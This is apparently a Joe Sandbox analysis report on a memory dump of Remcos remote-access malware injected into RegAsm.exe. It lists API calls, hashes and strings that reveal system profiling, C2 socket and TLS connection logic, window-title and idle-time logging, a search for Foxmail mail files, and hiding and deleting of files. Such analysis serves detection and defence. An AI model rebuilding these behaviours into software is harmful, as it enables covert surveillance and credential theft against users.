• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
• String ID:
• API String ID: 3950776272-0
• Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
• Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
• Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
• Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
APIs
• Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
• Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
• Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
• Sleep.KERNEL32(00000BB8), ref: 0040F896
• ExitProcess.KERNEL32 ref: 0040F905
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 5.1.2 Pro$override$pth_unenc
• API String ID: 2281282204-3554326054
• Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
• Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
• Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
• Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Time$FileSystem
• String ID: GetSystemTimePreciseAsFileTime$t'`/
• API String ID: 2086374402-2186028862
• Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
• Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
• Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
• Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
APIs
• CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,0086A1C8), ref: 004338DA
• CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
• Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
• Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
• Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
APIs
• GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
• GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Name$ComputerUser
• String ID:
• API String ID: 4229901323-0
                                                                                                                                                                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                                                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
APIs
• SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
• Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
• Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
• Instruction Fuzzy Hash:

Control-flow Graph (graph data omitted)
APIs
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
• GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
• String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-EPF38I$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
• API String ID: 2830904901-3119171474
• Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
• Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
• Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
• Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

Control-flow Graph (graph data omitted)
APIs
• Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
• WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
• Sleep.KERNEL32(00000000,00000002), ref: 00415B12
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Sleep$ErrorLastLocalTime
• String ID: | $%I64u$5.1.2 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-EPF38I$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
• API String ID: 524882891-3751314634
• Opcode ID: 8eec2c691427c46707f38074d2631b5f8e9ad24c24841cd07b2db5240619491e
• Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
• Opcode Fuzzy Hash: 8eec2c691427c46707f38074d2631b5f8e9ad24c24841cd07b2db5240619491e
• Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
• Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
• Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
• Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
• Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
• Sleep.KERNEL32(00000064), ref: 00412ECF
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$0TG$0TG$NG$NG
• API String ID: 1223786279-2576077980
• Opcode ID: eaa2c7ded2fb993fb69df274429c638ebd8ce54d64ed8dcd9df39e74ccc7a972
• Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
• Opcode Fuzzy Hash: eaa2c7ded2fb993fb69df274429c638ebd8ce54d64ed8dcd9df39e74ccc7a972
• Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
• lstrlenW.KERNEL32(?), ref: 100014C5
• lstrlenW.KERNEL32(?), ref: 100014E0
• lstrlenW.KERNEL32(?,?), ref: 1000150F
• lstrcatW.KERNEL32(00000000), ref: 10001521
• lstrlenW.KERNEL32(?,?), ref: 10001547
• lstrcatW.KERNEL32(00000000), ref: 10001553
• lstrlenW.KERNEL32(?,?), ref: 10001579
• lstrcatW.KERNEL32(00000000), ref: 10001585
• lstrlenW.KERNEL32(?,?), ref: 100015AB
• lstrcatW.KERNEL32(00000000), ref: 100015B7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
• Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

Control-flow Graph

APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
• LoadLibraryA.KERNEL32(?), ref: 00414E52
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
• FreeLibrary.KERNEL32(00000000), ref: 00414E79
• LoadLibraryA.KERNEL32(?), ref: 00414EB1
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
• FreeLibrary.KERNEL32(00000000), ref: 00414ECA
• GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
• FreeLibrary.KERNEL32(00000000), ref: 00414EF0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
• Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
• Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
• Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
• Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                                                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                                                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                                                                                                  • API String ID: 3795512280-1152054767
                                                                                                                                                                                                  • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                                                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Graph of the function starting at 004048C8 (interactive rendering and basic-block edge list not reproduced)
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • connect.WS2_32(FFFFFFFF,021C4988,00000010), ref: 004048E0
                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                                  • API String ID: 994465650-2151626615
                                                                                                                                                                                                  • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                                                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                                  • API String ID: 911427763-3954389425
                                                                                                                                                                                                  • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                                                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Graph of the function starting at 0040DA6F (interactive rendering and basic-block edge list not reproduced)
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LongNamePath
                                                                                                                                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                                  • API String ID: 82841172-425784914
                                                                                                                                                                                                  • Opcode ID: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                                                                                                                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Graph of the function starting at 0044ACC9 (interactive rendering and basic-block edge list not reproduced)
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
